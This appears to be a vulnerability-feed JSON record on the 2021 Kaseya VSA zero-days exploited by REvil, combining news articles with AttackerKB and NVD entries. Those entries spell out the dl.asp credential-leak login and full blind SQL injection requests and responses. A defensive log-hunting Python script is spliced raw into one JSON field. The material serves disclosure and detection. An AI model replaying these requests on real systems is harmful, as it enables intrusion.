[Bloomberg](<https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say>) reported that software engineering and development employees at Kaseya\u2019s U.S. offices had brought up a laundry list of \u201cwide-ranging cybersecurity concerns\u201d to company leaders multiple times over the course of three years, from 2017 to 2020. 
When the outlet asked Kaseya to address the anonymous workers\u2019 accusations, a Kaseya spokesperson declined, citing a policy of not commenting on matters involving personnel or the ongoing criminal investigation into the hack.\n\nUPDATE 1: Dana Liedholm, senior vice president of corporate marketing for Kaseya, told Threatpost on Monday that the company has bigger fish to fry than responding to \u201crandom speculation\u201d: \u201cKaseya\u2019s focus is on the customers who have been affected and the people who have actual data and are trying to get to the bottom of it, not on random speculation by former employees or the wider world,\u201d Liedholm said via email.\n\nUPDATE 2: Jake Williams, co-founder and CTO at incident response firm BreachQuest, told Threatpost that dismissing workers\u2019 input as being \u201cspeculation\u201d doesn\u2019t make the accusations less credible. \u201cAfter a quick analysis of the VSA server product, it\u2019s pretty easy to believe these claims,\u201d he said via email. \u201cUntil management at software development firms begin prioritizing security fixes over feature updates, we can expect incidents like this to continue. The fact that Kaseya downplayed the reported 40-page security memo as \u2018speculation\u2019, without denying its existence, is a huge red flag and lends a lot of credence to the claims.\u201d\n\nUPDATE 3: Granted, managing security is tough for any company, including software vendors, noted Dirk Schrader, global vice president of security research at New Net Technologies (NNT). That doesn\u2019t let them off the hook, though, he told Threatpost on Monday. 
\u201cA company can\u2019t decline doing the essentials, because that is equivalent to being negligent on the risks related to cybersecurity, and there is plenty of material about what is essential.\u201d\n\nQuick searches point to areas in Kaseya\u2019s security that could be improved, Schrader added, such as outdated certificates on networking devices and on Kaseya\u2019s own instances of VSA. \u201cIt comes down to its security operations, its processes and whether they are up to par with the current threat landscape,\u201d Schrader said.\n\nTo support his statement, Schrader pointed to Cisco IOS device(s) [with an outdated cert](<https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88>) used by Kaseya itself, noting that there are a couple of IPs showing the same issue. He found multiple additional certificate issues, including [this one](<https://whois.arin.net/rest/net/NET-208-75-20-88-1/pft?s=208.75.20.88>) and [this one](<https://whois.arin.net/rest/net/NET-23-31-43-48-1/pft?s=23.31.43.59>).\n\n## A Baker\u2019s Half-Dozen of Bugs\n\nMost of the seven vulnerabilities reported to Kaseya by DIVD were patched on Kaseya\u2019s VSA SaaS service, but up until Saturday, three outstanding security holes on the VSA on-premise version still needed to be battened down. 
The attackers had snuck into that gap before Kaseya had a chance to bolster its on-premise VSA servers.\n\nThe three on-premise VSA bugs that Kaseya has now stomped:\n\n * [CVE-2021-30116](<https://csirt.divd.nl/cves/CVE-2021-30116>) \u2013 A credentials leak and business logic flaw, included in [version 9.5.7](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) rolled out on Saturday.\n * [CVE-2021-30119](<https://csirt.divd.nl/cves/CVE-2021-30119>) \u2013 A cross-site scripting (XSS) vulnerability, included in version 9.5.7.\n * [CVE-2021-30120](<https://csirt.divd.nl/cves/CVE-2021-30120>) \u2013 A bypass of two-factor authentication (2FA), included in version 9.5.7.\n\nFollowing the July 2 onslaught, Kaseya urged on-premise VSA customers to shut down their servers until the patch was ready. To punch up security still more, Kaseya is also [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417>) limiting network access to the VSA Application/GUI to local IP addresses only, \u201cby blocking all inbound traffic except for port 5721 (the agent port). Administrators will only be able to access the application from the local network or by using a VPN to connect to the local network.\u201d\n\n## Older Bugs\n\nBesides the outstanding trio of bugs Kaseya addressed over the weekend, these are the other four vulnerabilities that DIVD disclosed and which Kaseya already fixed before the July 2 attacks:\n\n * [CVE-2021-30117](<https://csirt.divd.nl/cves/CVE-2021-30117>) \u2013 An SQL injection vulnerability, resolved in a May 8 patch.\n * [CVE-2021-30118](<https://csirt.divd.nl/cves/CVE-2021-30118>) \u2013 A remote code execution (RCE) vulnerability, resolved in an April 10 patch. 
(v9.5.6)\n * [CVE-2021-30121](<https://csirt.divd.nl/cves/CVE-2021-30121>) \u2013 A [local file inclusion (LFI) vulnerability](<https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion>), resolved in the May 8 patch.\n * [CVE-2021-30201](<https://csirt.divd.nl/cves/CVE-2021-30201>) \u2013 An [XML external entity (XXE) vulnerability](<https://owasp.org/www-community/vulnerabilities/XML_External_Entity_\\(XXE\\)_Processing>), resolved in the May 8 patch.\n\n071221 11:58 UPDATE: Added commentary from Dana Liedholm.\n\n071221 12:13 UPDATE: Added commentary from Jake Williams.\n\n071221 12:32 UPDATE: Added commentary from Dirk Schrader.\n", "cvss3": {}, "published": "2021-07-12T15:53:42", "type": "threatpost", "title": "Kaseya Patches Zero-Days Used in REvil Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T15:53:42", "id": "THREATPOST:E35CE2557CF4CF511B2359A81096AE4F", "href": "https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-03-07T15:39:02", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. 
The default URL for this page is <https://x.x.x.x/dl.asp>. When an attacker downloads a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini), which contains an Agent_Guid and AgentPassword. This Agent_Guid and AgentPassword can be used to log in on dl.asp ([https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9](<https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9>)). This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication.\n\nSecurity issues discovered:\n\n * Unauthenticated download page leaks credentials\n * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents\n * dl.asp accepts credentials via a GET request\n * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. 
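Because dl.asp takes the agent credentials in a GET query string, the login itself lands in the web server's access log, and the same client then using the resulting session against pages an agent never calls is what an incident responder should hunt for. The following is an added example, not code from DIVD, AttackerKB or Kaseya. It assumes the IIS site serving dl.asp writes W3C logs with at least the date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query and sc-status fields enabled (columns are mapped from the #Fields header, so extra fields are fine); AGENT_PAGES and PIVOT_WINDOW are tuning choices, not Kaseya values; the lines in SAMPLE_LOG are constructed for the example, reusing the agent id and password quoted in the CVE text.

```python
"""Hunt for the CVE-2021-30116 abuse pattern in IIS W3C logs (added example)."""
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qs, unquote_plus

# Constructed sample log; the un=/pw= values are the ones quoted in the CVE text.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2021-07-02 14:02:11 203.0.113.7 GET /dl.asp - 200
2021-07-02 14:02:19 203.0.113.7 GET /dl.asp un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9 200
2021-07-02 14:02:31 203.0.113.7 GET /InstallTab/exportFldr.asp fldrId=1' 500
2021-07-02 14:02:40 203.0.113.7 GET /InstallTab/exportFldr.asp fldrId=(SELECT+(CASE+WHEN+(1%3D1)+THEN+1+ELSE+(SELECT+1+UNION+SELECT+2)+END)) 200
2021-07-02 14:05:02 198.51.100.9 GET /dl.asp un=123456789012345&pw=0f0f0f0f0f0f0f0f 200
2021-07-02 14:06:10 198.51.100.9 GET /dl.asp - 200
"""

# Assumption for this example: the only page an agent install/check-in is
# expected to touch over HTTP. Anything else reached after a dl.asp login is a pivot.
AGENT_PAGES = {"/dl.asp"}
PIVOT_WINDOW = timedelta(minutes=10)
SQLI_MARKERS = re.compile(r"'|--|/\*|\b(select|union|case\s+when|waitfor)\b", re.IGNORECASE)


def parse_iis_log(text):
    """Parse W3C lines into dicts keyed by the names in the #Fields header."""
    fields, records = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log has no #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line; IIS never writes spaces inside a field
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        rec["query"] = "" if rec["cs-uri-query"] == "-" else unquote_plus(rec["cs-uri-query"])
        records.append(rec)
    return records


def is_dl_asp_login(rec):
    """Return the agent id when dl.asp was called with un= and pw= in the query."""
    if not rec["cs-uri-stem"].lower().endswith("/dl.asp"):
        return None
    params = parse_qs(rec["query"])
    return params["un"][0] if "un" in params and "pw" in params else None


def looks_like_sqli(raw_query):
    """Cheap indicator for injection attempts in a (still URL-encoded) query string."""
    return bool(SQLI_MARKERS.search(unquote_plus(raw_query)))


def find_credential_pivots(records, window=PIVOT_WINDOW):
    """Clients that log in via dl.asp and then hit non-agent pages inside the window.

    Correlation is by client IP: IIS does not log the sessionId cookie by default.
    """
    findings = {}
    for rec in records:
        agent_id = is_dl_asp_login(rec)
        if agent_id is None:
            continue
        pivots = [o for o in records
                  if o["c-ip"] == rec["c-ip"]
                  and rec["ts"] < o["ts"] <= rec["ts"] + window
                  and o["cs-uri-stem"].lower() not in AGENT_PAGES]
        if not pivots:
            continue
        f = findings.setdefault(rec["c-ip"], {
            "client": rec["c-ip"], "agent_id": agent_id,
            "login_at": rec["ts"], "pivots": [], "sqli": False})
        f["pivots"].extend(f"{o['cs-method']} {o['cs-uri-stem']}?{o['query']} -> {o['sc-status']}"
                           for o in pivots)
        f["sqli"] = f["sqli"] or any(looks_like_sqli(o["cs-uri-query"]) for o in pivots)
    return list(findings.values())


if __name__ == "__main__":
    for f in find_credential_pivots(parse_iis_log(SAMPLE_LOG)):
        print(f"{f['client']} logged in as agent {f['agent_id']} at {f['login_at']}, "
              f"then reached {len(f['pivots'])} non-agent page(s); sqli={f['sqli']}")
        for p in f["pivots"]:
            print("   ", p)
```

On the constructed log only 203.0.113.7 is reported: it authenticates with agent credentials and, within seconds, probes /InstallTab/exportFldr.asp with a stray quote and then the CASE/UNION payload, so the finding also carries sqli=True. The second client logs in and only fetches the download page again, which is what an agent install looks like, and is left alone. Point the parser at the real log directory and widen the window if VSA sessions in your environment live longer.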
Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30116", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2022-04-04T00:00:00", "id": "AKB:923F0E8E-CF44-416D-A421-F2177898261A", "href": "https://attackerkb.com/topics/9rki8uOHTf/cve-2021-30116", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T02:29:45", "description": "The API call /InstallTab/exportFldr.asp is vulnerable to a semi-authenticated boolean-based blind SQL injection in the parameter fldrId. 
Detailed description \u2014\u2013 Given the following request: `GET /InstallTab/exportFldr.asp?fldrId=1\u2019 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Where the sessionId cookie value has been obtained via CVE-2021-30116. The result should be a failure. Response: `HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 19:12:11 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 881 <!DOCTYPE html> <HTML> <HEAD> <title>Whoops.</title> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=Edge\" /> <link id=\"favIcon\" rel=\"shortcut icon\" href=\"/themes/default/images/favicon.ico?307447361\"></link> ----SNIP----` However when fldrId is set to \u2018(SELECT (CASE WHEN (1=1) THEN 1 ELSE (SELECT 1 UNION SELECT 2) END))\u2019 the request is allowed. 
Request: `GET /InstallTab/exportFldr.asp?fldrId=%28SELECT%20%28CASE%20WHEN%20%281%3D1%29%20THEN%201%20ELSE%20%28SELECT%201%20UNION%20SELECT%202%29%20END%29%29 HTTP/1.1 Host: 192.168.1.194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Cookie: ASPSESSIONIDCQACCQCA=MHBOFJHBCIPCJBFKEPEHEDMA; sessionId=30548861; agentguid=840997037507813; vsaUser=scopeId=3&roleId=2; webWindowId=59091519;` Response: `HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; Charset=Utf-8 Date: Thu, 01 Apr 2021 17:33:53 GMT Strict-Transport-Security: max-age=63072000; includeSubDomains Connection: close Content-Length: 7960 <html> <head> <title>Export Folder</title> <style> ------ SNIP -----`\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-30117", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117"], "modified": "2022-04-04T00:00:00", "id": "AKB:D51087FF-AE7C-4A0E-9BA9-F897BA18D238", "href": "https://attackerkb.com/topics/1KBaJEE0fi/cve-2021-30117", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:39:22", "description": "[](<https://thehackernews.com/images/-amElwT4flB4/YOP-7QNm6uI/AAAAAAAADGc/CJfNcjNsvDcuA16PdqeS-uDGR5r9urDxgCLcBGAsYHQ/s0/kk.png>)\n\nU.S. technology firm Kaseya, which is firefighting the largest ever [supply-chain ransomware strike](<https://thehackernews.com/2021/07/kaseya-revil-ransomware-attack.html>) on its VSA on-premises product, ruled out the possibility that its codebase was unauthorizedly tampered with to distribute malware.\n\nWhile initial reports raised speculations that REvil, the ransomware gang behind the attack, might have gained access to Kaseya's backend infrastructure and abused it to deploy a malicious update to VSA servers running on client premises, in a modus operandi similar to that of the devastating SolarWinds hack, it has since emerged that a never-before-seen security vulnerability ([CVE-2021-30116](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) in the software was leveraged to push ransomware to Kaseya's customers.\n\n\"The attackers were able to exploit zero-day vulnerabilities in the VSA product to bypass authentication and run arbitrary command execution,\" the Miami-headquartered company [noted](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403584098961>) in the incident analysis. \"This allowed the attackers to leverage the standard VSA product functionality to deploy ransomware to endpoints. 
There is no evidence that Kaseya's VSA codebase has been maliciously modified.\"\n\nIn other words, while successful zero-day exploitation of the Kaseya VSA software by itself isn't a supply-chain attack, taking advantage of the exploit to compromise managed service providers (MSPs) and breach their customers would constitute one.\n\nIt is, however, unclear how the hackers learned of the vulnerabilities. The details of those flaws have not yet been publicly released, although Huntress Labs [revealed](<https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident>) that \"Cybercriminals have exploited an arbitrary file upload and code injection vulnerability and have high confidence an authentication bypass was used to gain access into these servers.\"\n\n[](<https://thehackernews.com/images/-M77M4RmcNEc/YOUxOS5ZdUI/AAAAAAAA4Sc/_p6iSb9UrLA1rb-HnPzBoLz2isflL5seACLcBGAsYHQ/s0/hack.jpg>) \n--- \nImage Source: [Cybereason](<https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles>) \n \nAbout 60 MSPs and 1,500 downstream businesses around the world have been paralyzed by the ransomware attack, according to the company's CEO Fred Voccola; most of the affected businesses are small concerns, like dental practices, architecture firms, plastic surgery centers, and libraries.\n\nHackers associated with the Russia-linked REvil ransomware-as-a-service (RaaS) group initially demanded $70 million in Bitcoins to release a decryptor tool for restoring all the affected businesses' data, although they have swiftly [lowered the asking price](<https://twitter.com/jackhcable/status/1411906687968161792>) to $50 million, suggesting a willingness to negotiate their demands in return for a lesser amount.\n\n\"REvil ransomware has been advertised on underground forums for three years and it is one of the most prolific RaaS operations,\" Kaspersky researchers [said](<https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/>) Monday, 
adding \"the gang earned over $100 million from its operations in 2020.\"\n\nThe attack chain worked by first deploying a malicious dropper via a PowerShell script which was executed through Kaseya's VSA software.\n\n\"This script disables Microsoft Defender for Endpoint protection features and then uses the certutil.exe utility to decode a malicious executable (agent.exe) that drops a legitimate Microsoft binary (MsMpEng.exe, an older version of Microsoft Defender) and malicious library (mpsvc.dll), which is the REvil ransomware. This library is then loaded by the legitimate MsMpEng.exe by utilizing the [DLL side-loading technique](<https://attack.mitre.org/techniques/T1574/002/>),\" the researchers added.\n\nThe incident has also led the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to offer mitigation guidance, urging businesses to enable multi-factor authentication, limit communication with remote monitoring and management (RMM) capabilities to known IP address pairs, and place administrative interfaces of RMM behind a virtual private network (VPN) or a firewall on a dedicated administrative network.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T07:03:00", "type": "thn", "title": "Kaseya Rules Out Supply-Chain Attack; Says VSA 0-Day Hit Its Customers Directly", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116"], "modified": "2021-07-07T04:45:24", "id": "THN:6141B56028352C293B8E6D7F0948C55C", "href": "https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[](<https://thehackernews.com/images/-BuDOZJHtpp4/YOvGtVhVe7I/AAAAAAAADJc/k-syNb5yylI7XPNIuSCJP6bhQaEkNelXgCLcBGAsYHQ/s0/software-update.jpg>)\n\nFlorida-based software vendor Kaseya on Sunday rolled out urgent updates to address critical security vulnerabilities in its Virtual System Administrator (VSA) solution that was used as a jumping off point to 
target as many as 1,500 businesses across the globe as part of a widespread [supply-chain ransomware attack](<https://thehackernews.com/2021/07/kaseya-rules-out-supply-chain-attack.html>).\n\nFollowing the incident, the company had urged on-premises VSA customers to shut down their servers until a patch was available. Now, almost 10 days later the firm has shipped [VSA version 9.5.7a (9.5.7.2994)](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041>) with fixes for three new security flaws \u2014 \n\n * **CVE-2021-30116** \\- Credentials leak and business logic flaw\n * **CVE-2021-30119** \\- Cross-site scripting vulnerability\n * **CVE-2021-30120** \\- Two-factor authentication bypass\n\nThe security issues are part of a total of seven vulnerabilities that were discovered and reported to Kaseya by the Dutch Institute for Vulnerability Disclosure ([DIVD](<https://thehackernews.com/2021/07/revil-used-0-day-in-kaseya-ransomware.html>)) earlier in April, of which four other weaknesses were remediated in previous releases \u2014\n\n * **CVE-2021-30117** \\- SQL injection vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30118** \\- Remote code execution vulnerability (Fixed in VSA 9.5.5)\n * **CVE-2021-30121** \\- Local file inclusion vulnerability (Fixed in VSA 9.5.6)\n * **CVE-2021-30201** \\- XML external entity vulnerability (Fixed in VSA 9.5.6)\n\nBesides fixes for the aforementioned shortcomings, the latest version also resolves three other flaws, including a bug that exposed weak password hashes in certain API responses to brute-force attacks as well as a separate vulnerability that could allow the unauthorized upload of files to the VSA server.\n\nFor additional security, Kaseya is [recommending](<https://helpdesk.kaseya.com/hc/en-gb/articles/4403869952657>) limiting access to the VSA Web GUI to local IP addresses by blocking port 443 inbound on the internet firewall for on-premises installations.\n\nKaseya is also warning its customers that installing 
the patch would force all users to change their passwords after login to meet new password requirements, adding that select features have been replaced with improved alternatives and that the \"release introduces some functional defects that will be corrected in a future release.\"\n\nBesides the rollout of the patch for on-premises versions of its VSA remote monitoring and management software, the company has also begun restoring its VSA SaaS infrastructure. \"The restoration of services is progressing according to plan, with 60% of our SaaS customers live and servers coming online for the rest of our customers in the coming hours,\" Kaseya [said](<https://www.kaseya.com/potential-attack-on-kaseya-vsa/>) in a rolling advisory.\n\nThe latest development comes days after Kaseya cautioned that spammers are capitalizing on the ongoing ransomware crisis to send out fake email notifications that appear to be Kaseya updates, only to infect customers with Cobalt Strike payloads to gain backdoor access to the systems and deliver next-stage malware.\n\nKaseya has said multiple flaws were chained together in what it called a \"sophisticated cyberattack\", and while it isn't exactly clear how it was executed, it's believed that a combination of CVE-2021-30116, CVE-2021-30119, and CVE-2021-30120 was used to carry out the intrusions. 
REvil, a prolific ransomware gang based in Russia, has claimed responsibility for the incident.\n\nThe use of trusted partners, such as software makers or service providers like Kaseya, to identify and compromise new downstream victims, often called a supply-chain attack, paired with file-encrypting ransomware infections, has also made it one of the largest and most significant such attacks to date.\n\nInterestingly, Bloomberg on Saturday reported that five former Kaseya employees had flagged the company about \"glaring\" security holes in its software between 2017 and 2020, but their concerns were brushed off.\n\n\"Among the most glaring problems was software underpinned by outdated code, the use of weak encryption and passwords in Kaseya's products and servers, a failure to adhere to basic cybersecurity practices such as regularly patching software and a focus on sales at the expense of other priorities,\" the report [said](<https://www.bloomberg.com/news/articles/2021-07-10/kaseya-failed-to-address-security-before-hack-ex-employees-say>).\n\nThe Kaseya attack marks the third time that ransomware affiliates have abused Kaseya products as a vector to deploy ransomware.\n\nIn [February 2019](<https://www.reddit.com/r/msp/comments/ani14t/local_msp_got_hacked_and_all_clients_cryptolocked/>), the Gandcrab ransomware cartel \u2014 which later [evolved into Sodinokibi and REvil](<https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/>) \u2014 leveraged a vulnerability in a Kaseya plugin for the ConnectWise Manage software to deploy ransomware on the networks of MSPs' customers. Then in [June 2019](<https://www.reddit.com/r/msp/comments/c2wls0/kaseya_weaponized_to_deliver_sodinokibi_ransomware/>), the same group went after Webroot SecureAnywhere and Kaseya VSA products to infect endpoints with Sodinokibi ransomware.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-12T04:36:00", "type": "thn", "title": "Kaseya Releases Patches for Flaws Exploited in Widespread Ransomware Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30116", "CVE-2021-30117", "CVE-2021-30118", "CVE-2021-30119", "CVE-2021-30120", "CVE-2021-30121", "CVE-2021-30201"], "modified": "2021-07-12T10:46:11", "id": "THN:1812C7168898D0993D0783FDC775739F", "href": "https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:18:24", "description": "Kaseya VSA before 9.5.7 allows credential disclosure, as exploited in the wild in July 2021. By default Kaseya VSA on premise offers a download page where the clients for the installation can be downloaded. 
The default URL for this page is https://x.x.x.x/dl.asp. When an attacker downloads a client for Windows and installs it, the file KaseyaD.ini is generated (C:\\Program Files (x86)\\Kaseya\\XXXXXXXXXX\\KaseyaD.ini), which contains an Agent_Guid and AgentPassword. This Agent_Guid and AgentPassword can be used to log in on dl.asp (https://x.x.x.x/dl.asp?un=840997037507813&pw=113cc622839a4077a84837485ced6b93e440bf66d44057713cb2f95e503a06d9). This request authenticates the client and returns a sessionId cookie that can be used in subsequent attacks to bypass authentication. Security issues discovered --- * Unauthenticated download page leaks credentials * Credentials of agent software can be used to obtain a sessionId (cookie) that can be used for services not intended for use by agents * dl.asp accepts credentials via a GET request * Access to KaseyaD.ini gives an attacker access to sufficient information to penetrate the Kaseya installation and its clients. Impact --- Via the page /dl.asp enough information can be obtained to give an attacker a sessionId that can be used to execute further (semi-authenticated) attacks against the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-09T14:15:00", "type": "cve", "title": "CVE-2021-30116", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", 
